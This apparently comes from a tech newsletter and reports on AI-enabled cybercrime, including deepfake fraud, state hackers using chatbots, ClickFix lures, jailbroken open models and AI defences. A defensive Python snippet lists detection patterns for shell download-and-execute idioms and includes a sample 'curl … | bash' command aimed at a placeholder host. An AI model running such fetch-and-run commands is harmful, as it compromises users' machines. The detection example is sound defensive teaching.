February 13, 2026: AI's New Battlefield: Hackers, Spies, and the Code That Fights Back



AI empowers cybercriminals with deepfakes and advanced malware, escalating global security threats. But it also offers powerful defenses and restores human voices.

Today’s key AI stories (one line each)

- AI is now a powerful productivity tool for cybercriminals, automating scams and lowering the bar for attacks.

- State-sponsored hackers from Iran, North Korea, China, and Russia are using models like Gemini for advanced reconnaissance and malware creation.

- China is rapidly becoming a leader in open-source AI, offering powerful, low-cost models that are changing global development.

- AI voice cloning technology is giving back the ability to speak to patients who have lost their voices to diseases like ALS.

- The Pentagon is pushing AI companies to remove safety restrictions for use in classified military networks.

AI's New Battlefield

Artificial intelligence promised a better future. It was meant to cure diseases. Solve climate change. Make our lives easier. But a shadow is growing alongside the light. AI is also becoming a weapon.

Think of AI as a productivity tool. It helps engineers write code faster. It helps artists create amazing images. But it helps criminals, too. And this isn't a distant, sci-fi threat. It is happening right now. Today.

We are in a new era. An era of AI-enhanced crime. It's an invisible battlefield. Fought with code and data. And the stakes are getting higher every day.

The New Criminal Toolkit

Hacking used to be hard. It required deep technical skill. Not anymore. AI has lowered the barrier to entry. It has democratized cybercrime.

It starts with something simple. Spam emails. We all get them. But AI makes them different. Better. Large language models (LLMs) can write fluent, convincing phishing emails. No more awkward grammar. No more obvious mistakes.

The numbers are stark. Researchers estimate that at least half of all spam email is now AI-generated. What about more sophisticated, targeted attacks? There, the share of AI-generated emails nearly doubled, from 7.6% to 14%, in just one year.

Then comes the next level. Deepfakes. This technology has evolved at a terrifying speed. It's no longer just about funny videos. It's about creating convincing clones. Of a voice. Of a face. Of a person you trust.

In 2024, this became horrifyingly real. A worker at an engineering firm got a video call. On the screen was his chief financial officer. Other senior employees joined. They all looked and sounded real. They told him to transfer $25 million. He did. But they weren't real. They were all AI deepfakes. The money was gone.

This is the new reality. Scams are becoming hyper-realistic. The tools are cheap and easy to use. Criminals are making money. And as long as it works, they will keep doing it.

From Petty Crime to National Security

The problem goes deeper than individual criminals. Nation-states are now in the game. A recent report from Google's Threat Intelligence Group is a wake-up call. It reveals how government-backed hackers are using AI.

The players are exactly who you'd expect. Groups from Iran, North Korea, China, and Russia. They are using powerful models, like Google's own Gemini, to sharpen their attacks.

What are they doing? They use AI for reconnaissance. They profile high-value targets. An Iranian group, APT42, uses AI to research defense companies and craft credible emails. A North Korean group, UNC2970, uses it to map job roles and gather intel for impersonating corporate recruiters.

This blurs the line. Is it professional research? Or is it malicious reconnaissance? With AI, it’s hard to tell until it’s too late.

The threat goes beyond planning. We are seeing new, AI-integrated malware. One example is called HONESTCUE. It's clever. The malware itself carries no ready-made malicious payload. Instead, it acts as a downloader. It calls an AI model's API, such as Gemini's, and asks the model to generate malicious code in real time. That code is then executed directly in the computer's memory, leaving little or no trace on the hard drive. This is known as a 'fileless' attack, and it is much harder for traditional, file-scanning security tools to detect.

Hackers are even weaponizing the AI platforms themselves. In 'ClickFix' campaigns, attackers use AI chatbots to generate helpful-looking instructions, for example a guide to fixing a common computer problem. But hidden inside the solution is a malicious script. The attackers then share a public link to this AI chat. Because the link comes from a trusted domain, like ChatGPT or Gemini, users trust it, run the commands themselves, and infect their own systems.
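To make the defensive side of this concrete, here is a minimal sketch of a heuristic that a help-desk tool or browser extension might run on "fix" instructions before a user pastes them into a terminal. The function name `flag_instructions` and the pattern list are hypothetical illustrations, not taken from any real product. They cover only a few well-known download-and-execute idioms, and attackers can easily obfuscate their way around simple regular expressions.

```python
import re

# Hypothetical, illustrative patterns only. A real filter would need much
# broader coverage, and determined attackers can obfuscate around simple regexes.
SUSPICIOUS_PATTERNS = {
    # Download a script and pipe it straight into a shell.
    "pipe-to-shell": re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba|z)?sh\b", re.IGNORECASE),
    # PowerShell invoked with an encoded (obfuscated) command argument.
    "encoded-powershell": re.compile(
        r"\bpowershell(\.exe)?\b[^\n]*\s-(e|enc|encodedcommand)\b", re.IGNORECASE
    ),
    # PowerShell's Invoke-Expression, often used to run downloaded text as code.
    "invoke-expression": re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE),
    # mshta.exe, a Windows binary frequently abused to run remote scripts.
    "mshta": re.compile(r"\bmshta(\.exe)?\b", re.IGNORECASE),
}


def flag_instructions(text: str) -> list[str]:
    """Return the names of suspicious patterns found in pasted 'fix' instructions."""
    return [name for name, pattern in SUSPICIOUS_PATTERNS.items() if pattern.search(text)]


guide = "Open Terminal and run: curl -fsSL https://example.invalid/fix.sh | bash"
print(flag_instructions(guide))  # ['pipe-to-shell']
```

A check like this cannot prove a guide is safe. It can only add friction, prompting the user to stop and ask before running a command they don't understand.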

The Open-Source Dilemma

This escalating arms race has a new catalyst. Open-source AI. In the past year, Chinese companies like DeepSeek, Alibaba (with Qwen), and Moonshot AI have released incredibly powerful models. They often match the performance of Western models like ChatGPT. But they are different in one key way.

They are open-source. Their 'weights', the core of the trained model, are published for anyone to download, study, and modify. This is amazing for innovation. It's making cutting-edge AI cheap, or even free. Startups in Silicon Valley are already building on these Chinese models.

But there's a dark side. Open-source models are easier to jailbreak. Because anyone can modify the weights, their built-in safety features can be stripped out. Ashley Jess, an intelligence analyst, notes that bad actors will likely adopt these models. They can tailor them for malicious needs.

A research project from NYU illustrated this point. The researchers created a ransomware prototype called 'PromptLock'. It used open-source models to automate every stage of an attack, from mapping a system to writing a personalized ransom note. It wasn't a real attack in the wild. But it was a chilling proof of concept. It showed that a largely autonomous, AI-driven attack is feasible.

Are We Doomed? The Defense Fights Back

The picture looks bleak. But the sky isn't falling. At least, not yet. Many experts argue the 'AI superhacker' idea is overblown. Existing security measures still work.

Your spam filter still catches a lot. Good security habits, like not clicking suspicious links, are still your best defense. As security expert Gary McGraw says, many of these attacks use automated tools that have existed for 20 years. The AI part is just making them more efficient.

And here's the twist. The best defense against malicious AI is... good AI. Security companies are in an AI arms race of their own. Microsoft says its AI systems process over 100 trillion potential threat signals every single day. AI is a master at spotting patterns. It can detect anomalies that a human analyst might miss.
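The core idea of spotting anomalies can be illustrated at toy scale. The sketch below uses a simple z-score test, an assumption chosen for clarity; it is not how Microsoft or any other vendor actually processes its signals. It flags any observation that sits more than `threshold` standard deviations from a historical baseline. The function name, threshold, and sample numbers are hypothetical.

```python
from statistics import mean, stdev


def find_anomalies(
    baseline: list[float], observations: dict[str, float], threshold: float = 3.0
) -> list[str]:
    """Return the keys of observations more than `threshold` standard
    deviations away from the baseline mean (a simple z-score test)."""
    mu = mean(baseline)
    sigma = stdev(baseline)  # sample standard deviation; needs at least 2 points
    if sigma == 0:
        # A perfectly flat baseline: treat any deviation at all as anomalous.
        return [key for key, value in observations.items() if value != mu]
    return [key for key, value in observations.items() if abs(value - mu) / sigma > threshold]


# Hypothetical hourly counts of failed logins from past, known-normal days.
baseline = [4, 6, 5, 5, 7, 3, 5, 6, 4, 5]
print(find_anomalies(baseline, {"09:00": 6, "10:00": 48}))  # ['10:00']
```

The baseline comes from past data only, so a sudden spike cannot inflate the standard deviation and hide itself. Production systems replace this single statistic with learned models that correlate many signals at once.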

Collaboration is also key. The good guys are sharing information. Projects like MITRE ATLAS and the OWASP GenAI Security Project are cataloging how criminals use AI. This helps everyone build better defenses. Sunlight is the best disinfectant.

Two Sides of the Same Coin

This battle of code can feel abstract. But it has a very human impact. The same technology that powers a deepfake scam can also perform miracles. Consider voice cloning.

Criminals use it to impersonate a CEO. To steal millions of dollars. But then there is the story of Jules Rodriguez. In 2020, he was diagnosed with ALS. By 2024, the disease was taking his voice, and a tracheostomy to help him breathe dealt the final blow. He and his wife thought they would never hear his voice again.

Then they found ElevenLabs. Using old recordings, they created an AI clone of his voice. It wasn't perfect. But it was him. Jules could speak again, in his own voice, through a computer. He is one of thousands who have been given back a piece of themselves by this technology.

This is the core paradox of AI. It is a tool. A force multiplier. It can recreate the voice or face of a loved one who has died, for comfort. Or it can generate fake nude images of a real person, for harassment. It is a reflection of our own intentions, amplified to an unimaginable scale.

The Arms Race We Can't Ignore

We are at a crossroads. AI is fundamentally lowering the barrier to sophisticated cyber operations. The pace of attacks will only accelerate. Jacob Klein at Anthropic put it best: many organizations are not prepared for what's coming.

This isn't just a technical challenge. It's a challenge of governance. Of ethics. Of foresight. We are in a constant, escalating race between attackers and defenders. A race we can't afford to lose.

For now, the advice is simple. Be careful. Stay vigilant. Update your systems. But as we navigate this new landscape, we must remember both the danger and the promise. We must fight to protect the incredible potential for good that this technology holds.